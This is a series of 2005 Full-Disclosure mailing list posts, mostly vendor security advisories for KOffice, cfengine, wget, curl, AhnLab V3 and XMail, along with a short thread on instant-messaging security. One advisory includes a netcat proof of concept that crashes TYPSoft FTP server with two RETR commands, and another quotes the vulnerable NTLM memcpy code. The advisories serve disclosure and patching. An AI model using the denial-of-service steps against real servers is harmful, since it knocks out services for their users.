RE: [Full-disclosure] Redmond Report: Yahoo for IM

[Aditya Deshmukh]

> Doug,
> I know you asked for a reply concerning "multi-vendor IM clients", but, I
> have to ask "WHAT ABOUT SECURITY"!!

Trillian is pretty good 

> I fight daily with pesky spam, maleware, viruses, and back-doors. Every
> computer I clean has some type of IM client or a residual of one including
> all the little extra "tool bars" and "weather bugs" and such. They HOG the
> enterprise bandwidth with "ads" not to mention the problems of employees
> keeping everything business. And now you tell me Windows wants to marry
into
> IM Is this going to be an "option" or one day a default insatallation?

and trillian have no problems with spyware and other advertisement and
spams... 
You can run an internal jabber server and use trilliand to connect to that 
Server. Takes care of security and employees buiness also. And a bonus its
open
source

> Exactly what is windows plan here?? Am I getting carried away? Will I be
> looking for "IM patches" on patch Tuesday Do I have a lot more
questions
> and concerns?? YES!

IM patches + other vluns in .net and yahoo messengers is the main reason
that 
I moved most of my clients to jabber server + trillian 3.1 pro and removed
AIM
Msn, ICQ and IRC plugins - it works like a charm 



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200510-12 ] KOffice, KWord: RTF import buffer overflow

[Sune Kloppenborg Jeppesen]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: KOffice, KWord: RTF import buffer overflow
  Date: October 14, 2005
  Bugs: #108411
ID: 200510-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


KOffice and KWord are vulnerable to a buffer overflow in the RTF
importer, potentially resulting in the execution of arbitrary code.

Background
==

KOffice is an integrated office suite for KDE. KWord is the KOffice
word processor.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  app-office/koffice < 1.4.1-r1 >= 1.4.1-r1
  2  app-office/kword   < 1.4.1-r1 >= 1.4.1-r1
---
 2 affected packages on all of their supported architectures.
---

Description
===

Chris Evans discovered that the KWord RTF importer was vulnerable to a
heap-based buffer overflow.

Impact
==

An attacker could entice a user to open a specially-crafted RTF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/koffice-1.4.1-r1"

All KWord users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/kword-1.4.1-r1"

References
==

  [ 1 ] CAN-2005-2971
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-2971
  [ 2 ] KDE Security Advisory: KWord RTF import buffer overflow
http://www.kde.org/info/security/advisory-20051011-1.txt

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-12.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgplb43OrZWYg.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MDKSA-2005:184 - Updated cfengine packages fix temporary file vulnerabilities

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   cfengine
 Advisory ID:MDKSA-2005:184
 Date:   October 13th, 2005

 Affected versions:  10.1, 10.2, 2006.0, Corporate 3.0,
 Corporate Server 2.1
 __

 Problem Description:

 Javier Fernández-Sanguino Peña discovered several insecure temporary
 file uses in cfengine <= 1.6.5 and  <= 2.1.16 which allows local users
 to overwrite arbitrary files via a symlink attack on temporary files
 used by vicf.in. (CAN-2005-2960)
 
 In addition, Javier discovered the cfmailfilter and cfcron.in files
 for cfengine <= 1.6.5 allow local users to overwrite arbitrary files
 via a symlink attack on temporary files (CAN-2005-3137)
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2960
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3137
 __

 Updated Packages:
  
 Mandrivalinux 10.1:
 acf648169c296d474886d1d98752a763  10.1/RPMS/cfengine-1.6.5-4.3.101mdk.i586.rpm
 176cbf5b72aba7c6a2b40daf4ee09c94  10.1/SRPMS/cfengine-1.6.5-4.3.101mdk.src.rpm

 Mandrivalinux 10.1/X86_64:
 a9bed51735d6762fe3e1d66c8657f65a  
x86_64/10.1/RPMS/cfengine-1.6.5-4.3.101mdk.x86_64.rpm
 176cbf5b72aba7c6a2b40daf4ee09c94  
x86_64/10.1/SRPMS/cfengine-1.6.5-4.3.101mdk.src.rpm

 Mandrivalinux 10.2:
 426fd00421697c85c0e63f527faac7e8  10.2/RPMS/cfengine-2.1.12-7.2.102mdk.i586.rpm
 edd39a03e85f5176a0c28667cc91c388  
10.2/RPMS/cfengine-cfservd-2.1.12-7.2.102mdk.i586.rpm
 5c9a0c525c45a802f5d89686123e751c  10.2/SRPMS/cfengine-2.1.12-7.2.102mdk.src.rpm

 Mandrivalinux 10.2/X86_64:
 e75f232aa540e80fb9a12558d0c1f105  
x86_64/10.2/RPMS/cfengine-2.1.12-7.2.102mdk.x86_64.rpm
 3680ec121accdf0cdf1830b374d804ee  
x86_64/10.2/RPMS/cfengine-cfservd-2.1.12-7.2.102mdk.x86_64.rpm
 5c9a0c525c45a802f5d89686123e751c  
x86_64/10.2/SRPMS/cfengine-2.1.12-7.2.102mdk.src.rpm

 Mandrivalinux 2006.0:
 61f3c7fe9cf1a69e889cfa4d476473af  
2006.0/RPMS/cfengine-base-2.1.15-2.2.20060mdk.i586.rpm
 5a7d6087787de6a9f98288c415562ced  
2006.0/RPMS/cfengine-cfagent-2.1.15-2.2.20060mdk.i586.rpm
 0cd9ecbccf2a0b4e775d6629b1b7416f  
2006.0/RPMS/cfengine-cfenvd-2.1.15-2.2.20060mdk.i586.rpm
 5c10e7371d807d4f42f2524f24809a92  
2006.0/RPMS/cfengine-cfexecd-2.1.15-2.2.20060mdk.i586.rpm
 0bd54480c32575625f3d42badf59d690  
2006.0/RPMS/cfengine-cfservd-2.1.15-2.2.20060mdk.i586.rpm
 1b3213afe77bd75af306a63f746994cd  
2006.0/SRPMS/cfengine-2.1.15-2.2.20060mdk.src.rpm

 Mandrivalinux 2006.0/X86_64:
 e81ea72b0431a8cc40753a6dee7037d2  
x86_64/2006.0/RPMS/cfengine-base-2.1.15-2.2.20060mdk.x86_64.rpm
 f997658d8fa1dea25353906141443ba9  
x86_64/2006.0/RPMS/cfengine-cfagent-2.1.15-2.2.20060mdk.x86_64.rpm
 bc560e64dc5de8046b9d14be43621a10  
x86_64/2006.0/RPMS/cfengine-cfenvd-2.1.15-2.2.20060mdk.x86_64.rpm
 1d3cb518f0266f57c182712350935fb8  
x86_64/2006.0/RPMS/cfengine-cfexecd-2.1.15-2.2.20060mdk.x86_64.rpm
 db890abf046c63d91fc5fb60c6b796a8  
x86_64/2006.0/RPMS/cfengine-cfservd-2.1.15-2.2.20060mdk.x86_64.rpm
 1b3213afe77bd75af306a63f746994cd  
x86_64/2006.0/SRPMS/cfengine-2.1.15-2.2.20060mdk.src.rpm

 Corporate Server 2.1:
 12057e0591bdb14e49b74d5c1c268196  
corporate/2.1/RPMS/cfengine-1.6.3-8.3.C21mdk.i586.rpm
 4026484a33d7d324da1dce56fd697842  
corporate/2.1/SRPMS/cfengine-1.6.3-8.3.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 4dc4d9a367d056f053af80118cee8886  
x86_64/corporate/2.1/RPMS/cfengine-1.6.3-8.3.C21mdk.x86_64.rpm
 4026484a33d7d324da1dce56fd697842  
x86_64/corporate/2.1/SRPMS/cfengine-1.6.3-8.3.C21mdk.src.rpm

 Corporate 3.0:
 0c82f22f7ef0f6db35eb5f19caba9d2d  
corporate/3.0/RPMS/cfengine-1.6.5-3.3.C30mdk.i586.rpm
 ac84162471431da5f5afae45d48ca5c8  
corporate/3.0/SRPMS/cfengine-1.6.5-3.3.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 bb704e30c6f6c0edb0b03d6a6d6c62d3  
x86_64/corporate/3.0/RPMS/cfengine-1.6.5-3.3.C30mdk.x86_64.rpm
 ac84162471431da5f5afae45d48ca5c8  
x86_64/corporate/3.0/SRPMS/cfengine-1.6.5-3.3.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security

[Full-disclosure] MDKSA-2005:183 - Updated wget packages fix NTLM authentication vulnerability

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   wget
 Advisory ID:MDKSA-2005:183
 Date:   October 13th, 2005

 Affected versions:  2006.0
 __

 Problem Description:

 A vulnerability in libcurl's NTLM function can overflow a stack-based
 buffer if given too long a user name or domain name in NTLM
 authentication is enabled and either a) pass a user and domain name to
 libcurl that together are longer than 192 bytes or b) allow (lib)curl
 to follow HTTP redirects and the new URL contains a URL with a user and
 domain name that together are longer than 192 bytes.
 
 Wget, as of version 1.10, uses the NTLM code from libcurl and is also
 vulnerable to this issue.
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3185
  http://curl.haxx.se/mail/lib-2005-10/0061.html
 __

 Updated Packages:
  
 Mandrivalinux 2006.0:
 b902b06ea1316dbcdf17796aa548a77e  2006.0/RPMS/wget-1.10-1.1.20060mdk.i586.rpm
 08749a1759b1b583b08393411dfced5a  2006.0/SRPMS/wget-1.10-1.1.20060mdk.src.rpm

 Mandrivalinux 2006.0/X86_64:
 c885bd2f1e463c7753c7ca562fc20942  
x86_64/2006.0/RPMS/wget-1.10-1.1.20060mdk.x86_64.rpm
 08749a1759b1b583b08393411dfced5a  
x86_64/2006.0/SRPMS/wget-1.10-1.1.20060mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDTyZ9mqjQ0CJFipgRAsPWAJwNFU9myzCrq1DK78fYvZnEIZ8lIwCg3Fuf
DeWqnJeKb6x3YGE0p8diykg=
=vo8Z
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MDKSA-2005:182 - Updated curl packages fix NTLM authentication vulnerability

[Mandriva Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   curl
 Advisory ID:MDKSA-2005:182
 Date:   October 13th, 2005

 Affected versions:  10.1, 10.2, 2006.0, Corporate 3.0,
 Multi Network Firewall 2.0
 __

 Problem Description:

 A vulnerability in libcurl's NTLM function can overflow a stack-based
 buffer if given too long a user name or domain name in NTLM
 authentication is enabled and either a) pass a user and domain name to
 libcurl that together are longer than 192 bytes or b) allow (lib)curl
 to follow HTTP redirects and the new URL contains a URL with a user and
 domain name that together are longer than 192 bytes.
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3185
  http://curl.haxx.se/mail/lib-2005-10/0061.html
 __

 Updated Packages:
  
 Mandrivalinux 10.1:
 f03596cfd096487930950f055113e25e  10.1/RPMS/curl-7.12.1-1.2.101mdk.i586.rpm
 888d28bd88686516b965801d4fa73ef5  10.1/RPMS/libcurl3-7.12.1-1.2.101mdk.i586.rpm
 14119a5933519cd326eab4b6912f9c89  
10.1/RPMS/libcurl3-devel-7.12.1-1.2.101mdk.i586.rpm
 95e5c325854b56bcc049ace852aacad9  10.1/SRPMS/curl-7.12.1-1.2.101mdk.src.rpm

 Mandrivalinux 10.1/X86_64:
 c8672912f86bbb916d12e9e1868230eb  
x86_64/10.1/RPMS/curl-7.12.1-1.2.101mdk.x86_64.rpm
 bd80d2720507b859b8da2df5f67fbf6a  
x86_64/10.1/RPMS/lib64curl3-7.12.1-1.2.101mdk.x86_64.rpm
 62e47838707d23ccf8e55c495458aaa6  
x86_64/10.1/RPMS/lib64curl3-devel-7.12.1-1.2.101mdk.x86_64.rpm
 95e5c325854b56bcc049ace852aacad9  
x86_64/10.1/SRPMS/curl-7.12.1-1.2.101mdk.src.rpm

 Mandrivalinux 10.2:
 02917ae6640125c7fd60dfe1d4c435af  10.2/RPMS/curl-7.13.1-2.1.102mdk.i586.rpm
 2547b81f7043b55a0b346e74817d5664  10.2/RPMS/libcurl3-7.13.1-2.1.102mdk.i586.rpm
 b1f52fa823b34b43cb925cef0f4ca554  
10.2/RPMS/libcurl3-devel-7.13.1-2.1.102mdk.i586.rpm
 853ad6f024fe5247d8e97c081c854476  10.2/SRPMS/curl-7.13.1-2.1.102mdk.src.rpm

 Mandrivalinux 10.2/X86_64:
 30c2447b5a8066da44547f30e8693aed  
x86_64/10.2/RPMS/curl-7.13.1-2.1.102mdk.x86_64.rpm
 aef8bdd4c0bda5743915c563dea36ee7  
x86_64/10.2/RPMS/lib64curl3-7.13.1-2.1.102mdk.x86_64.rpm
 9da4ae9331b99a7a2a07acd2d4c2cb5a  
x86_64/10.2/RPMS/lib64curl3-devel-7.13.1-2.1.102mdk.x86_64.rpm
 853ad6f024fe5247d8e97c081c854476  
x86_64/10.2/SRPMS/curl-7.13.1-2.1.102mdk.src.rpm

 Mandrivalinux 2006.0:
 07805740a9f93561d6ac56918a781245  2006.0/RPMS/curl-7.14.0-2.1.20060mdk.i586.rpm
 3d97dd7714cbe0b198683163467c0d6f  
2006.0/RPMS/libcurl3-7.14.0-2.1.20060mdk.i586.rpm
 6a7d8ed065b64e03e3bdd12c60611655  
2006.0/RPMS/libcurl3-devel-7.14.0-2.1.20060mdk.i586.rpm
 850cab614960f3a8ea2121d5e35457af  2006.0/SRPMS/curl-7.14.0-2.1.20060mdk.src.rpm

 Mandrivalinux 2006.0/X86_64:
 aa1ccbb76d1f0a706c72c44028d8e4cc  
x86_64/2006.0/RPMS/curl-7.14.0-2.1.20060mdk.x86_64.rpm
 ec71600f685de4c15211c83a399bd04a  
x86_64/2006.0/RPMS/lib64curl3-7.14.0-2.1.20060mdk.x86_64.rpm
 b791d65f418fd714466f07549f8688fd  
x86_64/2006.0/RPMS/lib64curl3-devel-7.14.0-2.1.20060mdk.x86_64.rpm
 850cab614960f3a8ea2121d5e35457af  
x86_64/2006.0/SRPMS/curl-7.14.0-2.1.20060mdk.src.rpm

 Multi Network Firewall 2.0:
 791c952a30b42a72f385ece06fdd1f47  mnf/2.0/RPMS/curl-7.11.0-2.2.M20mdk.i586.rpm
 717b91b2099ad4132ce54dc8da3cff44  
mnf/2.0/RPMS/libcurl2-7.11.0-2.2.M20mdk.i586.rpm
 6fdb16af536f1539ce60cecefd2db61b  mnf/2.0/SRPMS/curl-7.11.0-2.2.M20mdk.src.rpm

 Corporate 3.0:
 40231d093f311328f0985db5f71ae7f9  
corporate/3.0/RPMS/curl-7.11.0-2.2.C30mdk.i586.rpm
 7974dc65bf872a05910a0017383f34a1  
corporate/3.0/RPMS/libcurl2-7.11.0-2.2.C30mdk.i586.rpm
 70f87a4964fdba5256d475796a6af4d8  
corporate/3.0/RPMS/libcurl2-devel-7.11.0-2.2.C30mdk.i586.rpm
 a952e90be7922ed1b153fca1c94b0d9b  
corporate/3.0/SRPMS/curl-7.11.0-2.2.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 6b34e27cc2729a905359d616ea98677f  
x86_64/corporate/3.0/RPMS/curl-7.11.0-2.2.C30mdk.x86_64.rpm
 36f7fbf58702e2a3d7d49fd384d9ae91  
x86_64/corporate/3.0/RPMS/lib64curl2-7.11.0-2.2.C30mdk.x86_64.rpm
 03d4b8f01e1b916afeff6d51b7b04581  
x86_64/corporate/3.0/RPMS/lib64curl2-devel-7.11.0-2.2.C30mdk.x86_64.rpm
 a952e90be7922ed1b153fca1c94b0d9b  
x86_64/corporate/3.0/SRPMS/curl-7.11.0-2.2.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Tea

[Full-disclosure] Redmond Report: Yahoo for IM

[Randall M]

 
 

1) Redmond Report Weekly

By Doug Barney
Editor in Chief, Redmond magazine 


YAHOO FOR IM
I love and hate IM. I love quick little tactical 
conversations and decisions that can be made while you're 
pretending to pay attention to someone else. It was also a 
way for me to talk to my kids, until they figured out how 
to block my messages. But I hate how some rely upon IM 
instead of the phone, and how hard it is to end a 
conversation. How many conversations end, 'Thanks, you're 
welcome, see ya, yeah, see you too!'?

Another thing I hate is how these relatively simple apps 
don't work together because stubborn vendors refuse to cooperate. 

But now Yahoo! and Microsoft, perhaps sharing a common 
hatred of Google, have set aside their minor differences 
and decided to interoperate. Here, here! Now let's just get 
AOL on the bandwagon. 

Have you had any luck with multi-vendor IM clients like 
Trillium? Let me know at [EMAIL PROTECTED]
http://redmondmag.com/news/article.asp?editorialsid=6982



Doug,
I know you asked for a reply concerning "multi-vendor IM clients", but, I
have to ask "WHAT ABOUT SECURITY"!!
I fight daily with pesky spam, maleware, viruses, and back-doors. Every
computer I clean has some type of IM client or a residual of one including
all the little extra "tool bars" and "weather bugs" and such. They HOG the
enterprise bandwidth with "ads" not to mention the problems of employees
keeping everything business. And now you tell me Windows wants to marry into
IM Is this going to be an "option" or one day a default insatallation?
Exactly what is windows plan here?? Am I getting carried away? Will I be
looking for "IM patches" on patch Tuesday Do I have a lot more questions
and concerns?? YES!

Thank You
Randall M

=

"You too can have your very own Computer!"

Note: Side effects include: 
Blue screens; interrupt violation;
illegal operations; remote code
exploitations; virus and maleware infestations;
and other unknown vulnerabilities.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] TYPSoft ftpd

[Morning Wood]

EXPL-A-2005-016 exploitlabs.com Advisory 045





AFFECTED PRODUCTS

TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/



OVERVIEW

TYPSoft FTP Server is a fast and easy ftp server
 with support to Standard FTP Command,
 Clean interface, Virtual File System architecture,
 ability to resume Download and Upload, IP Restriction,
 Login/Quit message, logs, Multi Language
 and many other things.



DETAILS

1. DOS
Typsoft ftp server does not properly support the
 RETR command. When "Sub Directory Include" is checked
 in the user config. This is exploitable by authenticated
 users to TYPSoft ftpd.



POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and
   does not appear exploitable.




SOLUTION:
vendor contact:
Oct 10, 2005 [EMAIL PROTECTED]

response:
-
Well i dont see any security problem except that TFS will raise an error
because the socket was not open on the second RETR

It's more a bug that a security problem except if you show me the opposite.

Marc
TYPSoft


reply:
--
see attatched perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

it demonstrates a full crash ( program exit ) from remote.
note: a remote DOS[crash] is classified as a security issue, even if it does
not
lead to compromise, due to the fact that a remote user ( not
administrative )
can disable[crash] a (needed) service.


response:
-
[none]




CREDITS

This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: AhnLab V3 Antivirus ALZ/UUE/XXE Archive Handling Buffer Overflow

[Secunia Research]

== 

 Secunia Research 13/10/2005

 - AhnLab V3 Antivirus ALZ/UUE/XXE Archive Handling Buffer Overflow -

== 
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Secunia8
Verification.9

== 
1) Affected Software 

AhnLab V3Pro 2004 (V3 VirusBlock 2005 international) (Build 6.0.0.457)
AhnLab V3Net for Windows Server 6.0 (Build 6.0.0.457)
AhnLab MyV3 with AzMain.dll 1.3.11.15

Prior versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AhnLab V3 
Antivirus, which can be exploited by malicious people to compromise
a vulnerable system.

The vulnerability is caused due to a boundary error in the archive
decompression library when reading the filename of a compressed file 
from an ALZ, UUE or XXE archive. This can be exploited to cause a 
stack-based buffer overflow (ALZ), or a heap-based buffer overflow
(UUE/XXE), when a malicious ALZ/UUE/XXE archive is scanned.

Successful exploitation allows arbitrary code execution, but requires 
that compressed file scanning is enabled.

== 
4) Solution 

AhnLab V3Pro 2004 (V3 VirusBlock 2005 international):
Update to version 6.0.0.488 via Smart Update.

AhnLab V3Net for Windows Server 6.0:
Update to version 6.0.0.488 via Smart Update.

AhnLab MyV3:
The vulnerability has reportedly been fixed in the vendor's Korean
MyV3 website.

== 
5) Time Table 

19/09/2005 - Initial vendor notification.
20/09/2005 - Initial vendor response.
13/10/2005 - Vendor releases advisory.
13/10/2005 - Public disclosure.

== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

== 
7) References

AhnLab:
http://global.ahnlab.com/security/security_advisory002.html

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-48/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] iDEFENSE Security Advisory 10.13.05: Multiple Vendor wget/curl NTLM Username Buffer Overflow Vulnerability

[iDEFENSE Labs]

Multiple Vendor wget/curl NTLM Username Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.13.05
www.idefense.com/application/poi/display?id=322&type=vulnerabilities
October 13, 2005

I. BACKGROUND

GNU Wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols. It is a
non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc. More
information on Wget is available from the vendor website:

http://www.gnu.org/software/wget/wget.html

curl is a command line tool for transferring files with URL syntax,
supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP.
Curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading,
HTTP form based upload, proxies, cookies, user+password authentication
(Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume,
proxy tunneling and a busload of other useful tricks. More information
on curl is available from the vendor website:

http://curl.haxx.se/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in multiple 
vendor's implementations of curl and wget allows attackers to execute 
arbitrary code. 

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied data supplied to a memory copy operation. The 
memcpy() of the supplied ntlm username to ntlmbuf shown below results 
in a stack overflow:

http-ntlm.c in ntlm_output() on line 532:

/* size is now 64 */
size=64;
ntlmbuf[62]=ntlmbuf[63]=0;

memcpy(&ntlmbuf[size], domain, domlen);
size += domlen;

memcpy(&ntlmbuf[size], usr, userlen);
size += userlen;

The resulting stack overflow can be leveraged to gain arbitrary code 
execution with user privileges.

III. ANALYSIS

Successful exploitation of the vulnerability allows remote attackers to 
execute arbitrary code with permissions of the http client process. 
User interaction is required. Exploitation requires a user to use one 
of the affected clients to connect to a malicious website.

This vulnerability affects both wget and curl clients similarly because 
wget 1.10 adopted the curl ntlm authentication source code into its own 
code base. The described vulnerability requires that ntlm authentication

is enabled in the affected client versions. A factor that somewhat 
increases the risk of this vulnerability is that a client can be forced 
to reconnect using ntlm authentication by issuing a HTTP 302 REDIRECT 
command to the connecting client.

IV. DETECTION

iDEFENSE Labs has confirmed the following software versions are 
vulnerable:

*   wget 1.10
*   curl 7.13.2
*   libcurl 7.13.2 

V. WORKAROUND

As a workaround solution, disable NTLM support in wget and curl 
installations.

VI. VENDOR RESPONSE

wget 1.10.2 has been released to address this issue and is available for
download at:

   http://ftp.gnu.org/pub/gnu/wget/

curl has released the following patch to address this issue:

   http://curl.haxx.se/libcurl-ntlmbuf.patch

curl has also released the following security advisory:

   http://curl.haxx.se/mail/lib-2005-10/0061.html
   
Additionally, the maintainers of curl-web have provided the following
details on affected versions:

Affected versions: curl and libcurl 7.10.6 to and including 7.14.1

Not affected versions: curl and libcurl 7.10.5 and earlier,
  7.15.0 and later

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3185 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
10/13/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.

[Full-disclosure] iDEFENSE Security Advisory 10.13.05: Multiple Vendor XMail 'sendmail' Recipient Buffer Overflow Vulnerability

[iDEFENSE Labs]

Multiple Vendor XMail 'sendmail' Recipient Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.13.05
www.idefense.com/application/poi/display?id=321&type=vulnerabilities
October 13, 2005

I. BACKGROUND

XMail is an Internet and intranet mail server. XMail sources compile
under GNU/Linux, FreeBSD, OpenBSD, NetBSD, OSX, Solaris and NT/2K/XP.

More information can be found at the vendor website:

   http://www.xmailserver.org/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in XMail, as
distributed with multiple vendors' operating systems, allows local
attackers to execute arbitrary code with elevated privileges.

The vulnerability exists because of insufficent bounds checking on
user-supplied data. Specifically, the AddressFromAtPtr function fails to
check bounds on arguments passed from other functions, and as a result
an exploitable stack overflow condition occurs when specifying the "-t"
command line option. The "-t" command line option allows users to
specify the recipient value in the text of the message on a line
beginning with "To:". XMail passes the user-supplied value without
bounds checking to AdressFromAtPtr and attempts to store the hostname
portion of the e-mail address in a 256-byte buffer. Crafted e-mail
addresses can overflow the buffer and overwrite stack process control
data, resulting in local code execution with elevated privileges.

III. ANALYSIS

Successful exploitation will result in code execution with elevated
privileges. XMail is distributed in RPM, DEB and source format. The RPM
distribution installs the sendmail binary with setuid root privileges.
Exploitation of XMail installed from RPM will yield root. Other
distribution formats install the sendmail binary as setgid mail.
Exploitation resulting in group mail privileges will allow an attacker
to read all unencrypted mail stored locally in the system mail folders.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in XMail
1.21.

V. WORKAROUND

As a workaround solution, local mail delivery can be restricted and a
standard mail user-agent may be used to talk to the XMail SMTP server.

VI. VENDOR RESPONSE

The vendor has released XMail 1.22 to address this issue which is
available for download at:

   http://www.xmailserver.org/

VII. CVE INFORMATION

